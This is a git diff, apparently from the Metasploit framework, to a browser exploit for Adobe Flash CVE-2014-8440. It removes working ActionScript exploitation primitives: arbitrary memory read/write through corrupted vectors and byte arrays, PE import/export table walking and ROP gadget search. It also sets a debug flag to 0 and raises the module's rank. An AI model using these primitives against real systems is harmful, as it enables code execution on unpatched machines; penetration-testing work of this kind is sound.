diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf
index a677624095..5062779ed8 100755
Binary files a/data/exploits/CVE-2014-8440/msf.swf and b/data/exploits/CVE-2014-8440/msf.swf differ
diff --git a/external/source/exploits/CVE-2014-8440/Exploit.as b/external/source/exploits/CVE-2014-8440/Exploit.as
index da8d636a59..c6e0928bd9 100755
--- a/external/source/exploits/CVE-2014-8440/Exploit.as
+++ b/external/source/exploits/CVE-2014-8440/Exploit.as
@@ -277,144 +277,5 @@ package
 }
 return 0xffffffff
 }
-
- // Use the corrupted shared_ba to disclose its own address
- private function search_ba_address():uint {
- var address:uint = 0
- this.shared_ba.position = 0x14
- address = shared_ba.readUnsignedInt()
- if (address == 0) {
- address = 0xffffffff
- this.shared_ba.position = 8
- var next:uint = shared_ba.readUnsignedInt()
- var prior:uint = shared_ba.readUnsignedInt()
- if (next - prior == 0x8000) {
- address = prior + 0x4000
- }
- } else {
- address = address - 0x30
- }
-
- return address
- }
-
- // Use the corrupted uint vector to search an vector with
- // interesting objects for info leaking
- private function search_object_vector():uint {
- var i:uint = 0;
- while (i < 0x4000){
- if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) {
- return i + 1;
- }
- i++
- }
- return 0xffffffff
- }
-
- // Methods to use the corrupted uint vector
-
- private function vector_write(addr:uint, value:uint = 0):void
- {
- var pos:uint = 0
-
- if (addr > this.uv[0]) {
- pos = ((addr - this.uv[0]) / 4) - 2
- } else {
- pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
- }
-
- this.uv[pos] = value
- }
-
- private function vector_read(addr:uint):uint
- {
- var pos:uint = 0
-
- if (addr > this.uv[0]) {
- pos = ((addr - this.uv[0]) / 4) - 2
- } else {
- pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
- }
-
- return this.uv[pos]
- }
-
- // Methods to use the corrupted byte array for arbitrary reading/writing
-
- private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
- {
- if (addr) ba.position = addr
- if (value is String) {
- for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
- if (zero) ba.writeByte(0)
- } else ba.writeUnsignedInt(value)
- }
-
- private function byte_read(addr:uint, type:String = "dword"):uint
- {
- ba.position = addr
- switch(type) {
- case "dword":
- return ba.readUnsignedInt()
- case "word":
- return ba.readUnsignedShort()
- case "byte":
- return ba.readUnsignedByte()
- }
- return 0
- }
-
- // Methods to search the memory with the corrupted byte array
-
- private function base(addr:uint):uint
- {
- addr &= 0xffff0000
- while (true) {
- if (byte_read(addr) == 0x00905a4d) return addr
- addr -= 0x10000
- }
- return 0
- }
-
- private function module(name:String, addr:uint):uint
- {
- var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80)
- var i:int = -1
- while (true) {
- var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
- if (!entry) throw new Error("FAIL!");
- ba.position = addr + entry
- var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
- if (dll_name == name.toUpperCase()) {
- break;
- }
- }
- return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
- }
-
- private function procedure(name:String, addr:uint):uint
- {
- var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
- var numberOfNames:uint = byte_read(eat + 0x18)
- var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
- var addressOfNames:uint = addr + byte_read(eat + 0x20)
- var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-
- for (var i:uint = 0; ; i++) {
- var entry:uint = byte_read(addressOfNames + i * 4)
- ba.position = addr + entry
- if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
- }
- return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
- }
-
- private function gadget(gadget:String, hint:uint, addr:uint):uint
- {
- var find:uint = 0
- var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
- var value:uint = parseInt(gadget, 16)
- for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
- return addr + i
- }
 }
 }
diff --git a/external/source/exploits/CVE-2014-8440/Logger.as b/external/source/exploits/CVE-2014-8440/Logger.as
index 61ec768c25..16c0447973 100755
--- a/external/source/exploits/CVE-2014-8440/Logger.as
+++ b/external/source/exploits/CVE-2014-8440/Logger.as
@@ -3,7 +3,7 @@ package
 import flash.external.ExternalInterface
 public class Logger {
- private static const DEBUG:uint = 1
+ private static const DEBUG:uint = 0
 public static function alert(msg:String):void {
diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
index 1847fc43ab..b4fa07267a 100644
--- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
+++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = GoodRanking
 include Msf::Exploit::Remote::BrowserExploitServer